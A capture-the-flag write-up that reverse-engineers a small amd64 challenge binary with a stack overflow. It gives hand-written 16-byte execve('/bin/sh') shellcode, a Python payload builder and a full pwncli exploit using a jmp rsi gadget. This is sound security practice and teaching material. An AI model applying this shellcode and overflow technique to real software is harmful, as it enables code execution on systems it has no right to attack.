Preface
This challenge is practice in writing shellcode.
Daily challenge plan: pushing myself to practise by sharing one problem a day! If you want to grind through problems together, let's practise, and keep each other on track!
Today is day 9. I worked on 强网 (QWB) today and couldn't solve a single one (sad
Challenge overview
Amidst the harrowing conflict, our city bore the brunt of relentless onslaughts, witnessing widespread devastation that spared little, ravaging both infrastructure and spirit alike. Now, as the dust settles and the echoes of chaos fade, a clarion call emerges: assemble a force to restore justice and herald a new era of tranquility. With the remnants of our past preserved within this binary, embark on your mission to reclaim our future.
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
Every protection is off (no canary, no PIE, an executable stack and RWX segments), so this is most likely a shellcode challenge.
Reverse engineering
There are only these few functions:
.text:0000000000401000 ; Attributes: noreturn bp-based frame
.text:0000000000401000
.text:0000000000401000 ; void __fastcall __noreturn start(int, void *, size_t)
.text:0000000000401000 public _start
.text:0000000000401000 _start proc near ; DATA XREF: LOAD:0000000000400018↑o
.text:0000000000401000 ; LOAD:0000000000400088↑o
.text:0000000000401000 push rbp
.text:0000000000401001 mov rbp, rsp
.text:0000000000401004 sub rsp, 20h
.text:0000000000401008 call _write
.text:000000000040100D call _read
.text:0000000000401012 call _exit
.text:0000000000401012 _start endp
.text:0000000000401012
.text:0000000000401017
.text:0000000000401017 ; =============== S U B R O U T I N E =======================================
.text:0000000000401017
.text:0000000000401017 ; Attributes: bp-based frame
.text:0000000000401017
.text:0000000000401017 ; ssize_t write(int fd, const void *buf, size_t n)
.text:0000000000401017 _write proc near ; CODE XREF: _start+8↑p
.text:0000000000401017 push rbp
.text:0000000000401018 mov rbp, rsp
.text:000000000040101B sub rsp, 20h
.text:000000000040101F mov rax, 1
.text:0000000000401026 mov rdi, 1 ; fd
.text:000000000040102D lea rsi, message ; "~~ When you stare into the abyss, the a"...
.text:0000000000401035 mov rdx, 62h ; 'b' ; count
.text:000000000040103C syscall ; LINUX - sys_write
.text:000000000040103E leave
.text:000000000040103F retn
.text:000000000040103F _write endp
.text:000000000040103F
.text:0000000000401040
.text:0000000000401040 ; =============== S U B R O U T I N E =======================================
.text:0000000000401040
.text:0000000000401040 ; Attributes: noreturn
.text:0000000000401040
.text:0000000000401040 ; void __noreturn exit(int status)
.text:0000000000401040 _exit proc near ; CODE XREF: _start+12↑p
.text:0000000000401040 mov rax, 1
.text:0000000000401047 mov rdi, 1 ; fd
.text:000000000040104E lea rsi, goodbye ; "\n~~ Farewell ~~\n"
.text:0000000000401056 mov rdx, 11h ; count
.text:000000000040105D syscall ; LINUX - sys_write
.text:000000000040105F mov rax, 3Ch ; '<'
.text:0000000000401066 xor rdi, rdi ; error_code
.text:0000000000401069 syscall ; LINUX - sys_exit
.text:000000000040106B jmp rsi
.text:000000000040106B _exit endp
.text:000000000040106B
.text:000000000040106D
.text:000000000040106D ; =============== S U B R O U T I N E =======================================
.text:000000000040106D
.text:000000000040106D ; Attributes: bp-based frame
.text:000000000040106D
.text:000000000040106D ; ssize_t read(int fd, void *buf, size_t nbytes)
.text:000000000040106D _read proc near ; CODE XREF: _start+D↑p
.text:000000000040106D
.text:000000000040106D buf = byte ptr -8
.text:000000000040106D
.text:000000000040106D push rbp
.text:000000000040106E mov rbp, rsp
.text:0000000000401071 sub rsp, 10h
.text:0000000000401075 mov rdi, 0 ; fd
.text:000000000040107C lea rsi, [rbp+buf] ; buf
.text:0000000000401080 mov rdx, 18h ; count
.text:0000000000401087 mov rax, 0
.text:000000000040108E syscall ; LINUX - sys_read
.text:0000000000401090 leave
.text:0000000000401091 retn
.text:0000000000401091 _read endp
.text:0000000000401091
.text:0000000000401091 _text ends
The _read function has a stack overflow: buf sits at rbp-8 (8 bytes), but the read syscall is told to read 0x18 = 24 bytes, so the saved rbp and the return address can both be overwritten.
Exploitation analysis
Current situation:
- The stack is executable (RWX segments, no NX).
- There is a stack overflow, but only 16 bytes past the buffer: 8 bytes of buf, then the saved rbp slot and the return address, exactly.
- The binary provides a `jmp rsi` gadget (at 0x40106b, right after the sys_exit syscall in _exit), and rsi still points at our input: sys_read leaves rsi untouched (the kernel only clobbers rcx and r11), and `leave`/`ret` do not modify it either.
So if we send shellcode, it has to run to completion within the 16 bytes before the return address (buf plus the saved-rbp slot); otherwise we would have to find a way to read in more data first.
Luckily the program ships a string we can borrow, so the shellcode does not need to carry "/bin/sh" itself; the "/bin/sh" suffix starts at 0x402050 + 0x15 = 0x402065:
.data:000000000040204F db 0Ah
.data:0000000000402050 db 'Your only savior is: /bin/sh',0
.data:000000000040206D ; char goodbye[]
.data:000000000040206D goodbye db 0Ah
Hand-write the shellcode, assemble it and extract the raw bytes:
Assemblers Avenge ➤ ./get_shellcode_raw.sh
shellcode.s: Assembler messages:
shellcode.s: Warning: end of file not at end of a line; newline inserted
00000000 48 c7 c7 65 20 40 00 31 d2 31 f6 6a 3b 58 0f 05 |H..e @.1.1.j;X..|
00000010
./get_shellcode_raw.sh: line 4: : command not found
shellcode_elf: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <_start>:
401000: 48 c7 c7 65 20 40 00 mov rdi,0x402065
401007: 31 d2 xor edx,edx
401009: 31 f6 xor esi,esi
40100b: 6a 3b push 0x3b
40100d: 58 pop rax
40100e: 0f 05 syscall
It comes out at exactly 16 bytes, right on the limit: execve("/bin/sh", NULL, NULL) via syscall 0x3b, with rdi pointing at the "/bin/sh" string in .data and argv/envp both zeroed. Since execve never returns on success, it does not matter that the return-address bytes follow the syscall in memory. We can submit it as-is.
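To make the two constraints above concrete (the 16 bytes of room before the return address, and the address of the borrowed "/bin/sh" string), here is an added Python example, not code from the original post, that encodes the same instruction sequence by hand, derives the "/bin/sh" address from the .data layout shown above, and lays out the 24-byte input against the frame of _read. The addresses and sizes are taken from the disassembly on this page; the function names and the NOP padding are my own, and the bytes it produces can be checked against the objdump output above.

```python
import struct

# Values recovered from the disassembly on this page (assumed accurate to this binary).
SAVIOR_STR_ADDR = 0x402050   # .data: 'Your only savior is: /bin/sh',0
SAVIOR_STR = b"Your only savior is: /bin/sh\0"
JMP_RSI = 0x40106B           # 'jmp rsi' right after the sys_exit syscall in _exit
BUF_SIZE = 8                 # buf = byte ptr [rbp-8]
READ_COUNT = 0x18            # mov rdx, 18h in _read
RET_SLOT = 8                 # the last 8 bytes read land on the return address
SYS_EXECVE = 0x3B


def overflow_size():
    """Bytes written past the end of buf: saved rbp + return address = 16."""
    return READ_COUNT - BUF_SIZE


def shellcode_room():
    """Bytes available for shellcode before the return-address slot: buf + saved rbp."""
    return READ_COUNT - RET_SLOT


def binsh_addr():
    """Address of the "/bin/sh" suffix inside the savior string in .data."""
    return SAVIOR_STR_ADDR + SAVIOR_STR.index(b"/bin/sh")


def mov_rdi_imm32(value):
    """Encode 'mov rdi, imm32' (REX.W C7 /0); the imm32 is sign-extended to 64 bits."""
    if not -0x80000000 <= value <= 0x7FFFFFFF:
        raise ValueError("address does not fit a sign-extended imm32; use movabs instead")
    return b"\x48\xc7\xc7" + struct.pack("<i", value)


def execve_shellcode(path_addr):
    """execve(path_addr, NULL, NULL): the same 16-byte sequence as the hand-written version."""
    return (
        mov_rdi_imm32(path_addr)          # rdi = "/bin/sh"           (7 bytes)
        + b"\x31\xd2"                     # xor edx, edx -> envp = 0  (2 bytes)
        + b"\x31\xf6"                     # xor esi, esi -> argv = 0  (2 bytes)
        + b"\x6a" + bytes([SYS_EXECVE])   # push 0x3b                 (2 bytes)
        + b"\x58"                         # pop rax                   (1 byte)
        + b"\x0f\x05"                     # syscall                   (2 bytes)
    )


def build_payload(shellcode, ret_addr=JMP_RSI):
    """buf(8) + saved rbp(8) hold the shellcode; the next 8 bytes become the return address."""
    room = shellcode_room()
    if len(shellcode) > room:
        raise ValueError(f"shellcode is {len(shellcode)} bytes but only {room} fit before ret")
    # NOP-pad so the return address lands exactly on the ret slot. execve never
    # returns on success, so nothing after the syscall is ever executed.
    payload = shellcode.ljust(room, b"\x90") + struct.pack("<Q", ret_addr)
    assert len(payload) == READ_COUNT
    return payload


if __name__ == "__main__":
    sc = execve_shellcode(binsh_addr())
    print(f"overflow = {overflow_size()} bytes, shellcode = {len(sc)} bytes")
    print(build_payload(sc).hex())
```

The `mov rdi` encoding is why the budget works out: REX.W C7 /0 takes a 32-bit immediate that the CPU sign-extends, so a fixed address like 0x402065 costs 7 bytes instead of the 10 a `movabs` would need. The same trick would not fit for an address above 0x7fffffff (a libc or stack address, say), which is exactly the case the `ValueError` guards against.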
Full exploit
#!/usr/bin/env python3
from pwncli import *

cli_script()  # pwncli: parse the command line and set up the local/remote target
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

# Raw bytes of the hand-written execve("/bin/sh", NULL, NULL) shellcode assembled above
with open("shellcode_raw", "rb") as f:
    sc = f.read()
# It must be exactly 16 bytes: buf (8) + saved rbp (8), so that the gadget
# address that follows lands precisely on the return address.
assert len(sc) == 16, "shellcode must fill buf + saved rbp exactly"

jmp_rsi = 0x000000000040106b  # 'jmp rsi' gadget after the sys_exit syscall in _exit

# rsi still points at buf when _read returns, so the gadget jumps into our shellcode
payload = sc + pack(jmp_rsi)
s(payload)  # pwncli shorthand for io.send
ia()        # pwncli shorthand for io.interactive
Summary
A shellcode challenge: a 16-byte hand-written execve shellcode placed in buf and the saved-rbp slot, reached through the binary's own `jmp rsi` gadget.